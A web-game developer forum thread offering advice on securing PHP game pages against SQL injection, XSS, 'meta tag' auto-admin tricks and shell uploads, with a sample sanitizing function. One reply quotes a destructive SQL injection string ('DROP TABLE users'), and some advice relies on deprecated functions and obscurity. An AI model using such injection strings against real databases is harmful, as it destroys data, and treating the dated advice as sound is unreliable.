Jump to content
MakeWebGames

Which Pages to Secure your game---A must read---

Joshua

By Joshua
in Game Support

 Share

Recommended Posts

Joshua Newbie

Joshua

Posted
Posted

Ok, so Granted i don't know EVERYTHING...but after 8 months now of working on my own site and dealing with attempted hacks, I've learned a few things.

 

I figured i' d make this post as just saying (Secure ALL pages) Doesn't appear to get through to people and for SOME reason everyone thinks that a few Header inserts will stop a hack.

Let me help you better understand why THIS is not going to stop anything.

 

1. abs@intval in header for securing users ID, ViewTopic and ViewForum, stop just that.

They make sure the user is the Right user. That's it, nothing more.

So while that may stop a quick URL injection hack, it doesnt stop SQL injections in your forums or any other form of hack XSS shell etc.

__________________

2. $IP hack is about one of the Only fixes I've seen on this board that helps stop a full fledged hacker that has more than 2 hacks to copy and paste.

People were using an Older version of Firefox and an X sploofer to IP hack games and make themselves admins.

The $IP secure stops this.

_________________________

Here are the Following pages that I know of that are exploitable and should be secured, Use mysql_real_escape To secure $_POSTS and $_GETS in all these folders, that's a starter.

 

Forum TOPIC

Forum SUBJECT----Even with the secured forums <meta tag> hacks will work on those 2. Secure them or even better, Ban if someone tries it automatically.

Signature--Again, <meta hacks> Can use signature to A. Auto admin when an Admin views your profile. or B. Re-Direct users to another site when they view your profile.. or C. The possibilites are endless.

 

Display Pic---By inserting hacks, users can become admin upon being viewed, just as Sig.

 

Username: Make sure they can't enter hacks, secure your names.

Forum Avatar/Sig---AGAIN secure this.

 

Player Report---it's a form, It can be exploited.

Bug Report---Another exploitable form.

Player Ads---Exploitable forms

Staff Apps--Forms

Basically Any page where you can Insert Form Data is the most susceptible to malicious attacks.

Secure all your $_GET and $_POST variables when possible and to prevent SHELL type hacks. Also learn to use sprintf( to clean all data.

Never share your Cpanel access with ANYONE you can't trust.

Change your password every so often--Keep it Difficult, dont make it "cool" or "silver" Try adding characthers and remember them such as...

iam!!elite2

View your Error logs!--This will tell you where people are trying to access your site! It also tells you their I.P for banning reasons :-) and helps you out with any little bugs you may encounter.

If you are able to do so

Change your staff_special folder over to a differant name no one will find out or guess. Then stick it in a specially named folder...go into everything that calls for staff special and rename it to your new name/location. That will stop the Auto Admin problem 100%. Unless they manage to upload a shell ><

That's all for now, I'll edit if i remember any more stuff. If you have questions about just how to do any of the stuff i asked, they make this BEAUTIFUL little feature, it's up top of the boards in the Right Hand corner, right next to a pretty green arrow..called.> SEARCH

Thanks :)

----IF YOU HAVE any question as to whether your site is vulnerable to hacks, Message me here or on msn [email protected] and I'll attempt the few that I have discovered.

--Nothing Malicious like a Shell Upload as I'm not sure how that one works--

Then you will know where to start.

Link to comment
Share on other sites
Djkanna Rookie

Djkanna

Posted
Posted

Just a little thing I'm not going to say anything else as at least your helping :)

1. abs@intval in header for securing users ID, ViewTopic and ViewForum, stop just that.

They make sure the user is the Right user. That's it, nothing more.

^^

That makes sure that it's an actual number.. :)

Link to comment
Share on other sites
Nicholas Newbie

Nicholas

Posted
Posted

may i just add? wouldnt the best way to stop people from becoming admins automaticly is to change the

user_level

in the database to something else that no one ever guess and then go on every single page of the game and find the

if($ir['user_level'] == 1)

if($ir['user_level'] == 2)

if($ir['user_level'] == 3)

if($ir['user_level'] == 4)

so on...

then change the user_level part into what you changed it into on the database?

or can they still make themselfs admin?

Link to comment
Share on other sites
Joshua Newbie

Joshua

Posted
  • Author
Posted

That's a "quick" fix as well, as it's only a matter of time before it's guessed, not to mention, youd have to change A LOT of files and update your SQL database tables.

It's much easier just to re-name files and change in the script, hide files, pword protect files etc.

If they want to find the user level, it wouldn't be to hard :P

Link to comment
Share on other sites
  • 7 months later...
Dillion & Amanda 4 Lif Newbie

Dillion & Amanda 4 Lif

Posted
Posted
Ok, so Granted i don't know EVERYTHING...but after 8 months now of working on my own site and dealing with attempted hacks, I've learned a few things.

 

I figured i' d make this post as just saying (Secure ALL pages) Doesn't appear to get through to people and for SOME reason everyone thinks that a few Header inserts will stop a hack.

Let me help you better understand why THIS is not going to stop anything.

 

1. abs@intval in header for securing users ID, ViewTopic and ViewForum, stop just that.

They make sure the user is the Right user. That's it, nothing more.

So while that may stop a quick URL injection hack, it doesnt stop SQL injections in your forums or any other form of hack XSS shell etc.

__________________

2. $IP hack is about one of the Only fixes I've seen on this board that helps stop a full fledged hacker that has more than 2 hacks to copy and paste.

People were using an Older version of Firefox and an X sploofer to IP hack games and make themselves admins.

The $IP secure stops this.

_________________________

Here are the Following pages that I know of that are exploitable and should be secured, Use mysql_real_escape To secure $_POSTS and $_GETS in all these folders, that's a starter.

 

Forum TOPIC

Forum SUBJECT----Even with the secured forums <meta tag> hacks will work on those 2. Secure them or even better, Ban if someone tries it automatically.

Signature--Again, <meta hacks> Can use signature to A. Auto admin when an Admin views your profile. or B. Re-Direct users to another site when they view your profile.. or C. The possibilites are endless.

 

Display Pic---By inserting hacks, users can become admin upon being viewed, just as Sig.

 

Username: Make sure they can't enter hacks, secure your names.

Forum Avatar/Sig---AGAIN secure this.

 

Player Report---it's a form, It can be exploited.

Bug Report---Another exploitable form.

Player Ads---Exploitable forms

Staff Apps--Forms

Basically Any page where you can Insert Form Data is the most susceptible to malicious attacks.

Secure all your $_GET and $_POST variables when possible and to prevent SHELL type hacks. Also learn to use sprintf( to clean all data.

Never share your Cpanel access with ANYONE you can't trust.

Change your password every so often--Keep it Difficult, dont make it "cool" or "silver" Try adding characthers and remember them such as...

iam!!elite2

View your Error logs!--This will tell you where people are trying to access your site! It also tells you their I.P for banning reasons :-) and helps you out with any little bugs you may encounter.

If you are able to do so

Change your staff_special folder over to a differant name no one will find out or guess. Then stick it in a specially named folder...go into everything that calls for staff special and rename it to your new name/location. That will stop the Auto Admin problem 100%. Unless they manage to upload a shell ><

That's all for now, I'll edit if i remember any more stuff. If you have questions about just how to do any of the stuff i asked, they make this BEAUTIFUL little feature, it's up top of the boards in the Right Hand corner, right next to a pretty green arrow..called.> SEARCH

Thanks :)

----IF YOU HAVE any question as to whether your site is vulnerable to hacks, Message me here or on msn [email protected] and I'll attempt the few that I have discovered.

--Nothing Malicious like a Shell Upload as I'm not sure how that one works--

Then you will know where to start.

Well aren't you supposed to secure every page? Guide is great, just saying. I think you posted this a while back though, so im sure you know by now. As for meta tags working on secured forums, It doesn't work on the ones i made.

Link to comment
Share on other sites
DougK Newbie

DougK

Posted
Posted

One really big thing that I see missing...

NEVER take raw input (PHP $_GET, $_POST or $_REQUEST) and put it directly into a query. This is just asking for trouble, as it opens up a hole for SQL injections.

Always sanitize any values that are going into the database queries, even if they are generated by a function. For example, if you have a dropdown box for selecting something, do NOT trust the value that you are getting just because it is not simple to change the values. There are plenty of tools out there that allow someone to intercept and modify data before it goes to the webserver.

So, how do you sanitize your input?

Check to make sure it is a value you expect. If you are looking for an integer, there should be no characters in it. is_int, is_double, is_string, and is_object are helpful for this.

If you are expecting a URL (say for a picture) You should make sure that it is properly formatted. Regex checking comes in handy here.

If it is something that you want to accept HTML (forums, mail, signatures, etc) I would suggest using striptags to remove any unwanted tags. Alternatively, you could block all html and only allow bbcodes or your own variation of. The newest version of PHP has bbcode functionality already built in, I believe it started with PHP 5.2.0, but I am not entirely sure.

While mysql_real_escape_string is a good start, you may want to use trim to remove extraneous whitespace from a string (newline, space, tab, carriage return, null-byte, etc)

A simple function for this would be: 

function make_safe($var, $allowablehtml='<a>

<img>')
{
$var = mysql_real_escape_string(trim($var)); //escape any special characters and remove trailing whitespace
$var = strip_tags($var, $allowablehtml); //remove unwanted HTML
$var = str_replace("\r\n", "", $var); //remove any carriage returns or newlines in the string.

return $var;
}

 

You can also add htmlentites to the function to convert any html special characters into their encoded equivalents, however this will render any real HTML input invalid because the resulting output when viewed in a browser will look like the actual HTML code. html_entity_decode will undo htmlentities if needed.

You could add a simple function that is called with every page load that automatically puts any input from the user through the make_safe function, but I would not advise doing so as there may be times when you want to be able to put in input that would be damaged by make_safe.

That aside, if you are making your own game from scratch, do not use an easy-to-guess table structure. If you keep the tables hard to guess, it is just that much more unlikely that a malicious user will be able to do anything. Also, it is a good idea to keep data that your users can edit separate from data that only the game itself should change. For example, username, profile, signature, etc should all be in one table; stats and player data should be in another. This will prevent a player from being able to credit themselves stats with an SQL injection, which shouldn't be a problem if you follow the above but having an extra layer of security never hurts.

Another thing you can do, if your webhost allows it, is to create different database users for different tasks. Have one user that only allows select, one that only allows update, one that allows delete, and one that allows create. This isn't a major issue, as PHP does not support multiple queries in a single mysql_query statement, so someone trying to do a '; DROP TABLE users; -- would not be able to do any harm. I'm not sure if ADODB has this same function, it looks like it does. Again, if you are checking anything and cleaning it up before putting it into a query, this wouldn't do much.

I hope my rambling makes sense.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...